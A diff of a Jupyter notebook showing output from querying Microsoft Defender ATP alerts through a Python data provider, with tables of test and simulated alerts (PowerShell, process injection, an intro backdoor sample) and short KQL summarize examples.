+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8c5437cd76a89ec983e3b364e219944da3dab464</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>137</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>42</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T17:11:14.931633Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>137</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>43</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-08T17:22:37.8742974Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>454</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                             AlertId                     EventTime  \\\n",
+       "0    da637111553314888493_-215032980  2019-12-08T17:22:37.8742974Z   \n",
+       "1   da637111470533220658_-1814166510  2019-12-05T12:34:34.7864124Z   \n",
+       "2   da637111470533220658_-1814166510  2019-12-05T12:34:34.7864124Z   \n",
+       "3    da637111448595540767_-885088719  2019-12-05T12:11:25.5486226Z   \n",
+       "4    da637111448595540767_-885088719  2019-12-05T12:11:25.5486226Z   \n",
+       "5   da637111835325717564_-1865655676  2019-12-05T16:05:46.4778106Z   \n",
+       "6   da637111835325717564_-1865655676  2019-12-05T16:05:46.4778106Z   \n",
+       "7     da637111691253610692_623907060  2019-12-05T16:50:16.9477916Z   \n",
+       "8     da637111691253610692_623907060  2019-12-05T16:50:16.9477916Z   \n",
+       "9   da637111691236503999_-1316647445  2019-12-05T16:56:18.6397738Z   \n",
+       "10  da637111691236503999_-1316647445  2019-12-05T16:56:18.6397738Z   \n",
+       "11  da637111691236503999_-1316647445  2019-12-05T16:56:18.6397738Z   \n",
+       "12  da637111691236503999_-1316647445  2019-12-05T16:56:18.6397738Z   \n",
+       "13   da637111691251815824_2024877765  2019-12-05T16:56:18.6407635Z   \n",
+       "14  da637111691256543941_-1462732472  2019-12-05T16:56:18.6407635Z   \n",
+       "15  da637111691246094719_-1324223004  2019-12-05T16:56:18.6685765Z   \n",
+       "16   da637111618734194967_-707278866  2019-12-05T16:56:18.8702258Z   \n",
+       "17   da637111691251004475_-451474344  2019-12-05T16:56:19.0725178Z   \n",
+       "18    da637111691511319089_701653122  2019-12-05T17:01:20.0899859Z   \n",
+       "19   da637111691521375847_1538423732  2019-12-05T17:01:20.0899859Z   \n",
+       "20   da637111691521375847_1538423732  2019-12-05T17:12:41.4195893Z   \n",
+       "21    da637111691511319089_701653122  2019-12-05T17:12:41.4195893Z   \n",
+       "22   da637111691521375847_1538423732  2019-12-05T17:12:41.4195893Z   \n",
+       "23  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "24  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "25  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "26  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "27  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "28  da637111691236503999_-1316647445  2019-12-05T17:12:43.2754844Z   \n",
+       "29   da637111691251815824_2024877765  2019-12-05T17:12:43.2822557Z   \n",
+       "30  da637111691256543941_-1462732472  2019-12-05T17:12:43.2822557Z   \n",
+       "31   da637111536085551266_1012263407  2019-12-05T14:38:34.3208724Z   \n",
+       "32   da637111536085551266_1012263407  2019-12-05T14:38:34.3208724Z   \n",
+       "33   da637111553314888493_-215032980  2019-12-05T15:06:20.3372768Z   \n",
+       "34   da637111553314888493_-215032980  2019-12-05T15:06:20.3372768Z   \n",
+       "35   da637111553314888493_-215032980  2019-12-05T15:22:44.3072402Z   \n",
+       "36   da637111553314888493_-215032980  2019-12-05T15:22:44.3072402Z   \n",
+       "37   da637111553314888493_-215032980  2019-12-05T16:02:02.3857966Z   \n",
+       "38   da637111553314888493_-215032980  2019-12-05T16:02:02.3857966Z   \n",
+       "39   da637111536085551266_1012263407  2019-12-08T15:59:28.1181531Z   \n",
+       "40   da637111536085551266_1012263407  2019-12-08T15:59:28.1181531Z   \n",
+       "41   da637111536085551266_1012263407   2019-12-08T17:11:14.931633Z   \n",
+       "42   da637111536085551266_1012263407   2019-12-08T17:11:14.931633Z   \n",
+       "43   da637111553314888493_-215032980  2019-12-08T17:22:37.8742974Z   \n",
+       "\n",
+       "                                   MachineId             ComputerName  \\\n",
+       "0   f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "1   1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739       olaa-win10pro-1607   \n",
+       "2   1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739       olaa-win10pro-1607   \n",
+       "3   499bdd5330f78dc82d0051c8d7a9eb9d69f88333    nestorw-win10pro-1803   \n",
+       "4   499bdd5330f78dc82d0051c8d7a9eb9d69f88333    nestorw-win10pro-1803   \n",
+       "5   be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "6   be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "7   be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "8   be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "9   be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "10  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "11  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "12  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "13  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "14  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "15  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "16  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "17  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "18  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "19  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "20  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "21  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "22  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "23  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "24  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "25  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "26  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "27  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "28  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "29  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "30  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "31  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "32  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "33  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "34  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "35  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "36  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "37  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "38  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "39  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "40  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "41  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "42  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "43  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "\n",
+       "         Severity            Category  \\\n",
+       "0          Medium      DefenseEvasion   \n",
+       "1   Informational           Execution   \n",
+       "2   Informational           Execution   \n",
+       "3   Informational           Execution   \n",
+       "4   Informational           Execution   \n",
+       "5          Medium      DefenseEvasion   \n",
+       "6          Medium      DefenseEvasion   \n",
+       "7   Informational           Execution   \n",
+       "8   Informational           Execution   \n",
+       "9          Medium      DefenseEvasion   \n",
+       "10         Medium      DefenseEvasion   \n",
+       "11         Medium      DefenseEvasion   \n",
+       "12         Medium      DefenseEvasion   \n",
+       "13         Medium         Persistence   \n",
+       "14         Medium         Persistence   \n",
+       "15  Informational           Execution   \n",
+       "16            Low             Malware   \n",
+       "17  Informational             Malware   \n",
+       "18         Medium  SuspiciousActivity   \n",
+       "19         Medium           Execution   \n",
+       "20         Medium           Execution   \n",
+       "21         Medium  SuspiciousActivity   \n",
+       "22         Medium           Execution   \n",
+       "23         Medium      DefenseEvasion   \n",
+       "24         Medium      DefenseEvasion   \n",
+       "25         Medium      DefenseEvasion   \n",
+       "26         Medium      DefenseEvasion   \n",
+       "27         Medium      DefenseEvasion   \n",
+       "28         Medium      DefenseEvasion   \n",
+       "29         Medium         Persistence   \n",
+       "30         Medium         Persistence   \n",
+       "31  Informational           Execution   \n",
+       "32  Informational           Execution   \n",
+       "33         Medium      DefenseEvasion   \n",
+       "34         Medium      DefenseEvasion   \n",
+       "35         Medium      DefenseEvasion   \n",
+       "36         Medium      DefenseEvasion   \n",
+       "37         Medium      DefenseEvasion   \n",
+       "38         Medium      DefenseEvasion   \n",
+       "39  Informational           Execution   \n",
+       "40  Informational           Execution   \n",
+       "41  Informational           Execution   \n",
+       "42  Informational           Execution   \n",
+       "43         Medium      DefenseEvasion   \n",
+       "\n",
+       "                                                Title  \\\n",
+       "0               Suspicious process injection observed   \n",
+       "1      [Test Alert] Suspicious Powershell commandline   \n",
+       "2      [Test Alert] Suspicious Powershell commandline   \n",
+       "3      [Test Alert] Suspicious Powershell commandline   \n",
+       "4      [Test Alert] Suspicious Powershell commandline   \n",
+       "5               Suspicious process injection observed   \n",
+       "6               Suspicious process injection observed   \n",
+       "7      [Test Alert] Suspicious Powershell commandline   \n",
+       "8      [Test Alert] Suspicious Powershell commandline   \n",
+       "9               Suspicious process injection observed   \n",
+       "10              Suspicious process injection observed   \n",
+       "11              Suspicious process injection observed   \n",
+       "12              Suspicious process injection observed   \n",
+       "13                  Anomaly detected in ASEP registry   \n",
+       "14  An uncommon file was created and added to a Ru...   \n",
+       "15        EAF violation blocked by exploit protection   \n",
+       "16           An active 'Artoelo' malware was detected   \n",
+       "17                     'Artoelo' malware was detected   \n",
+       "18                     A suspicious file was observed   \n",
+       "19        Suspicious behavior by cmd.exe was observed   \n",
+       "20        Suspicious behavior by cmd.exe was observed   \n",
+       "21                     A suspicious file was observed   \n",
+       "22        Suspicious behavior by cmd.exe was observed   \n",
+       "23              Suspicious process injection observed   \n",
+       "24              Suspicious process injection observed   \n",
+       "25              Suspicious process injection observed   \n",
+       "26              Suspicious process injection observed   \n",
+       "27              Suspicious process injection observed   \n",
+       "28              Suspicious process injection observed   \n",
+       "29                  Anomaly detected in ASEP registry   \n",
+       "30  An uncommon file was created and added to a Ru...   \n",
+       "31     [Test Alert] Suspicious Powershell commandline   \n",
+       "32     [Test Alert] Suspicious Powershell commandline   \n",
+       "33              Suspicious process injection observed   \n",
+       "34              Suspicious process injection observed   \n",
+       "35              Suspicious process injection observed   \n",
+       "36              Suspicious process injection observed   \n",
+       "37              Suspicious process injection observed   \n",
+       "38              Suspicious process injection observed   \n",
+       "39     [Test Alert] Suspicious Powershell commandline   \n",
+       "40     [Test Alert] Suspicious Powershell commandline   \n",
+       "41     [Test Alert] Suspicious Powershell commandline   \n",
+       "42     [Test Alert] Suspicious Powershell commandline   \n",
+       "43              Suspicious process injection observed   \n",
+       "\n",
+       "                                     FileName  \\\n",
+       "0                                 notepad.exe   \n",
+       "1                              powershell.exe   \n",
+       "2                                     cmd.exe   \n",
+       "3                              powershell.exe   \n",
+       "4                                     cmd.exe   \n",
+       "5                              powershell.exe   \n",
+       "6                                 notepad.exe   \n",
+       "7                              powershell.exe   \n",
+       "8                                     cmd.exe   \n",
+       "9                           RuntimeBroker.exe   \n",
+       "10                          RuntimeBroker.exe   \n",
+       "11                          RuntimeBroker.exe   \n",
+       "12              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "13              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "14              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "15                          RuntimeBroker.exe   \n",
+       "16              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "17              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "18                             powershell.exe   \n",
+       "19                             powershell.exe   \n",
+       "20  WindowsDefenderAtpProvisioningService.exe   \n",
+       "21  WindowsDefenderAtpProvisioningService.exe   \n",
+       "22                                    cmd.exe   \n",
+       "23              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "24                          RuntimeBroker.exe   \n",
+       "25                          RuntimeBroker.exe   \n",
+       "26                          RuntimeBroker.exe   \n",
+       "27                          RuntimeBroker.exe   \n",
+       "28              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "29              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "30              WinATP-Intro-Backdoor‮gpj.exe   \n",
+       "31                             powershell.exe   \n",
+       "32                                    cmd.exe   \n",
+       "33                             powershell.exe   \n",
+       "34                                notepad.exe   \n",
+       "35                             powershell.exe   \n",
+       "36                                notepad.exe   \n",
+       "37                             powershell.exe   \n",
+       "38                                notepad.exe   \n",
+       "39                                    cmd.exe   \n",
+       "40                             powershell.exe   \n",
+       "41                                    cmd.exe   \n",
+       "42                             powershell.exe   \n",
+       "43                             powershell.exe   \n",
+       "\n",
+       "                                        SHA1 RemoteUrl RemoteIP  ReportId  \\\n",
+       "0   b6d237154f2e528f0b503b58b025862d66b02b73                          454   \n",
+       "1   044a0cf1f6bc478a7172bf207eef1e201a18ba02                         4369   \n",
+       "2   99ae9c73e9bee6f9c76d6f4093a9882df06832cf                         4369   \n",
+       "3   1b3b40fbc889fd4c645cc12c85d0805ac36ba254                        14968   \n",
+       "4   3ce71813199abae99348f61f0caa34e2574f831c                        14968   \n",
+       "5   36c5d12033b2eaf251bae61c00690ffb17fddc87                         2376   \n",
+       "6   d487580502354c61808c7180d1a336beb7ad4624                         2376   \n",
+       "7   36c5d12033b2eaf251bae61c00690ffb17fddc87                          915   \n",
+       "8   8dca9749cd48d286950e7a9fa1088c937cbccad4                          915   \n",
+       "9   7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1190   \n",
+       "10  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1190   \n",
+       "11  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1190   \n",
+       "12  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1190   \n",
+       "13  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1187   \n",
+       "14  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1187   \n",
+       "15  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1191   \n",
+       "16                                                                   1200   \n",
+       "17  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1194   \n",
+       "18  36c5d12033b2eaf251bae61c00690ffb17fddc87                         1449   \n",
+       "19  36c5d12033b2eaf251bae61c00690ffb17fddc87                         1449   \n",
+       "20  2f5a566429f0df02dd0dfb45be075531f332a887                         1960   \n",
+       "21  2f5a566429f0df02dd0dfb45be075531f332a887                         1960   \n",
+       "22                                                                   1960   \n",
+       "23  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1972   \n",
+       "24  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1972   \n",
+       "25  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1972   \n",
+       "26  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1972   \n",
+       "27  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1972   \n",
+       "28  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1972   \n",
+       "29  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1970   \n",
+       "30  79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc                         1970   \n",
+       "31  6cbce4a295c163791b60fc23d285e6d84f28ee4c                           45   \n",
+       "32  8c5437cd76a89ec983e3b364e219944da3dab464                           45   \n",
+       "33  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          256   \n",
+       "34  b6d237154f2e528f0b503b58b025862d66b02b73                          256   \n",
+       "35  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          368   \n",
+       "36  b6d237154f2e528f0b503b58b025862d66b02b73                          368   \n",
+       "37  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          162   \n",
+       "38  b6d237154f2e528f0b503b58b025862d66b02b73                          162   \n",
+       "39  8c5437cd76a89ec983e3b364e219944da3dab464                          130   \n",
+       "40  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          130   \n",
+       "41  8c5437cd76a89ec983e3b364e219944da3dab464                          137   \n",
+       "42  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          137   \n",
+       "43  6cbce4a295c163791b60fc23d285e6d84f28ee4c                          454   \n",
+       "\n",
+       "                    Table  \n",
+       "0              MiscEvents  \n",
+       "1   ProcessCreationEvents  \n",
+       "2   ProcessCreationEvents  \n",
+       "3   ProcessCreationEvents  \n",
+       "4   ProcessCreationEvents  \n",
+       "5              MiscEvents  \n",
+       "6              MiscEvents  \n",
+       "7   ProcessCreationEvents  \n",
+       "8   ProcessCreationEvents  \n",
+       "9              MiscEvents  \n",
+       "10             MiscEvents  \n",
+       "11             MiscEvents  \n",
+       "12             MiscEvents  \n",
+       "13         RegistryEvents  \n",
+       "14         RegistryEvents  \n",
+       "15             MiscEvents  \n",
+       "16             MiscEvents  \n",
+       "17             MiscEvents  \n",
+       "18     FileCreationEvents  \n",
+       "19     FileCreationEvents  \n",
+       "20     FileCreationEvents  \n",
+       "21     FileCreationEvents  \n",
+       "22     FileCreationEvents  \n",
+       "23             MiscEvents  \n",
+       "24             MiscEvents  \n",
+       "25             MiscEvents  \n",
+       "26             MiscEvents  \n",
+       "27             MiscEvents  \n",
+       "28             MiscEvents  \n",
+       "29         RegistryEvents  \n",
+       "30         RegistryEvents  \n",
+       "31  ProcessCreationEvents  \n",
+       "32  ProcessCreationEvents  \n",
+       "33             MiscEvents  \n",
+       "34             MiscEvents  \n",
+       "35             MiscEvents  \n",
+       "36             MiscEvents  \n",
+       "37             MiscEvents  \n",
+       "38             MiscEvents  \n",
+       "39  ProcessCreationEvents  \n",
+       "40  ProcessCreationEvents  \n",
+       "41  ProcessCreationEvents  \n",
+       "42  ProcessCreationEvents  \n",
+       "43             MiscEvents  "
+      ]
+     },
+     "execution_count": 39,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "md_prov.MDATP.list_alerts()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Execute queries with custom parameters:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 37,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>count_</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <td>0</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>29</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>1</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>14</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>2</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "        Severity  count_\n",
+       "0         Medium      29\n",
+       "1  Informational      14\n",
+       "2            Low       1"
+      ]
+     },
+     "execution_count": 37,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "md_prov.MDATP.list_alerts(start=\"-30\", add_query_items=\"| summarize count() by Severity\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Print a fully constructed query for debug purposes:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 40,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "' AlertEvents | where EventTime >= datetime(2019-12-03T23:24:40.794583Z) | where EventTime <= datetime(2020-01-02T23:24:40.794583Z) | summarize count() by Severity'"
+      ]
+     },
+     "execution_count": 40,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "md_prov.MDATP.list_alerts(\"print\", start=\"-30\", add_query_items=\"| summarize count() by Severity\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Execute a custom query:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 43,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>AlertId</th>\n",
+       "      <th>EventTime</th>\n",
+       "      <th>MachineId</th>\n",
+       "      <th>ComputerName</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Category</th>\n",
+       "      <th>Title</th>\n",
+       "      <th>FileName</th>\n",
+       "      <th>SHA1</th>\n",
+       "      <th>RemoteUrl</th>\n",
+       "      <th>RemoteIP</th>\n",
+       "      <th>ReportId</th>\n",
+       "      <th>Table</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <td>0</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-08T17:22:37.8742974Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>b6d237154f2e528f0b503b58b025862d66b02b73</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>454</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>1</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T17:11:14.931633Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8c5437cd76a89ec983e3b364e219944da3dab464</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>137</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>2</td>\n",
+       "      <td>da637111470533220658_-1814166510</td>\n",
+       "      <td>2019-12-05T12:34:34.7864124Z</td>\n",
+       "      <td>1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739</td>\n",
+       "      <td>olaa-win10pro-1607</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>99ae9c73e9bee6f9c76d6f4093a9882df06832cf</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>4369</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>3</td>\n",
+       "      <td>da637111448595540767_-885088719</td>\n",
+       "      <td>2019-12-05T12:11:25.5486226Z</td>\n",
+       "      <td>499bdd5330f78dc82d0051c8d7a9eb9d69f88333</td>\n",
+       "      <td>nestorw-win10pro-1803</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>1b3b40fbc889fd4c645cc12c85d0805ac36ba254</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>14968</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>4</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T16:56:18.6397738Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1190</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>5</td>\n",
+       "      <td>da637111835325717564_-1865655676</td>\n",
+       "      <td>2019-12-05T16:05:46.4778106Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>2376</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>6</td>\n",
+       "      <td>da637111835325717564_-1865655676</td>\n",
+       "      <td>2019-12-05T16:05:46.4778106Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>d487580502354c61808c7180d1a336beb7ad4624</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>2376</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>7</td>\n",
+       "      <td>da637111691253610692_623907060</td>\n",
+       "      <td>2019-12-05T16:50:16.9477916Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
